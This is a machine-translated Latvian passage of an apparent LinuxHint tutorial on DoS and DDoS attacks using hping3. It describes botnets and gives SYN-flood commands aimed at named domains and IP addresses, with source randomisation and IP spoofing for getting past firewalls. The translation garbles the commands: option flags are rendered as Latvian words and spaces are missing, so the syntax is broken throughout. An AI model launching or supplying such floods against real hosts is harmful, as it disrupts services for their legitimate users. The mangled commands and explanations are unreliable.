hping3 plūdu ddos

Hping3 Flood Ddos



Šī apmācība koncentrējas uz DDOS (Distributed Denial of Service) uzbrukumiem, izmantojot rīku hping3. Ja esat jau iepazinies ar DOS (Denial of Service) un DDOS uzbrukumiem, varat turpināt lasīt no hping3 praktiskajiem norādījumiem, pretējā gadījumā ieteicams uzzināt, kā šie uzbrukumi darbojas.

DOS uzbrukumi


Pakalpojuma noraidīšanas (DOS) uzbrukums ir ļoti vienkāršs paņēmiens, lai liegtu piekļuvi pakalpojumiem (tāpēc to sauc par pakalpojumu atteikuma uzbrukumu). Šis uzbrukums sastāv no mērķa pārslogošanas ar pārāk lielām paketēm vai lielu to daudzumu.







Lai gan šo uzbrukumu ir ļoti viegli izpildīt, tas neapdraud mērķa informāciju vai privātumu, tas nav iespiešanās uzbrukums, un tā mērķis ir tikai novērst piekļuvi mērķim.
Nosūtot pakešu daudzumu, mērķis nevar tikt galā ar uzbrucējiem, kas neļauj serverim apkalpot likumīgus lietotājus.



DOS uzbrukumi tiek veikti no vienas ierīces, tāpēc tos ir viegli apturēt, bloķējot uzbrucēja IP, tomēr uzbrucējs var mainīt un pat izkrāpt (klonēt) mērķa IP adresi, taču ugunsmūriem nav grūti tikt galā ar šādiem uzbrukumiem pretēji tam, kas notiek ar DDOS uzbrukumiem.



DDOS uzbrukumi

Distributed Denial of Service uzbrukums (DDOS) ir līdzīgs DOS uzbrukumam, bet tiek veikts no dažādiem mezgliem (vai dažādiem uzbrucējiem) vienlaicīgi. Parasti DDOS uzbrukumus veic robottīkli. Botneti ir automatizēti skripti vai programmas, kas inficē datorus, lai veiktu automatizētu uzdevumu (šajā gadījumā DDOS uzbrukumu). Hakeris var izveidot robottīklu un inficēt daudzus datorus, no kuriem botneti uzsāks DOS uzbrukumus, un fakts, ka daudzi robottīkli vienlaicīgi šauj, pārvērš DOS uzbrukumu DDOS uzbrukumā (tāpēc to sauc par izplatītu).





Protams, ir izņēmumi, kuros DDOS uzbrukumus veica reāli cilvēku uzbrucēji, piemēram, hakeru grupa Anonīms, ko integrēja tūkstošiem cilvēku visā pasaulē, šo paņēmienu izmantoja ļoti bieži, pateicoties tās vieglajai ieviešanai (bija nepieciešami tikai brīvprātīgie, kas dalījās ar savu cēloni), piemēram, Anonīms iebrukuma laikā pilnībā atvienoja Kadafi Lībijas valdību, un Lībijas valsts palika neaizsargāta tūkstošiem uzbrucēju no visas pasaules.

Šāda veida uzbrukumus, kas tiek veikti no daudziem dažādiem mezgliem, ir ārkārtīgi grūti novērst un apturēt, un parasti tiem nepieciešama īpaša aparatūra, jo ugunsmūri un aizsardzības lietojumprogrammas nav gatavas vienlaicīgi tikt galā ar tūkstošiem uzbrucēju. Tas neattiecas uz hping3, lielāko daļu uzbrukumu, kas tiek veikti, izmantojot šo rīku, bloķēs aizsardzības ierīces vai programmatūra, tomēr tas ir noderīgi vietējos tīklos vai pret slikti aizsargātiem mērķiem.



Par hping3

Rīks hping3 ļauj nosūtīt manipulētas paketes. Šis rīks ļauj kontrolēt pakešu lielumu, daudzumu un sadrumstalotību, lai pārslogotu mērķi un apietu vai uzbruktu ugunsmūriem. Hping3 var būt noderīgs drošības vai spēju pārbaudes nolūkos, izmantojot to, jūs varat pārbaudīt ugunsmūra efektivitāti un to, vai serveris var apstrādāt lielu pakešu daudzumu. Zemāk jūs atradīsit norādījumus par to, kā izmantot hping3 drošības pārbaudes nolūkos.

Darba sākšana ar DDOS uzbrukumiem, izmantojot hping3:

Debian un bāzētos Linux izplatījumos hping3 var instalēt, palaižot:

#trāpīgsuzstādīthping3-un

Vienkāršs DOS (nevis DDOS) uzbrukums būtu šāds:

#sudohping3-S --plūdi -V -lpp 80170.155.9.185

Kur:
sudo: piešķir nepieciešamās privilēģijas, lai palaistu hping3.
hping3:
izsauc hping3 programmu.
-S: norāda SYN paketes.
-plūdi: fotografējiet pēc saviem ieskatiem, atbildes tiks ignorētas (tāpēc atbildes netiks rādītas), un paketes tiks nosūtītas pēc iespējas ātrāk.
-V: Daudzvārdības.
-80. lpp. portu 80, varat aizstāt šo numuru pakalpojumam, kuram vēlaties uzbrukt.
170.155.9.185: mērķa IP.

Plūdi, izmantojot SYN paketes pret portu 80:

Šis piemērs attēlo SYN uzbrukumu lacampora.org:

#sudohping3 lacampora.org-q -n -d 120 -S -lpp 80 --plūdi -un avots

Kur:
Lacampora.org: ir mērķis
-q: īss iznākums
-n: parādīt mērķa IP, nevis saimniekdatoru.
-d 120: iestatiet pakešu izmēru
-un avots: slēpt IP adresi.

Šis piemērs parāda citu iespējamo plūdu piemēru:

SYN plūdi pret 80. portu:

#sudohping3-un avotsivan.com-S -q -lpp 80 --plūdi

Izmantojot hping3, jūs varat arī uzbrukt saviem mērķiem ar viltotu IP, lai apietu ugunsmūri, jūs pat varat klonēt savu mērķa IP vai jebkuru atļauto adresi, kuru jūs zināt (to varat sasniegt, piemēram, ar Nmap vai sniffer, lai noklausītos savienojumi).

Sintakse būtu šāda:

#sudohping3-uz <FAKE IP> <mērķis> -S -q -lpp 80 -ātrāk -c2

Šajā praktiskajā piemērā uzbrukums varētu šķist:

#sudohping3-uz190.0.175.100 190.0.175.100-S -q -lpp 80 -ātrāk -c2

Es ceru, ka jums bija noderīga šī apmācība par hping3. Turpiniet sekot LinuxHint, lai iegūtu vairāk padomu un atjauninājumu par Linux un tīklu.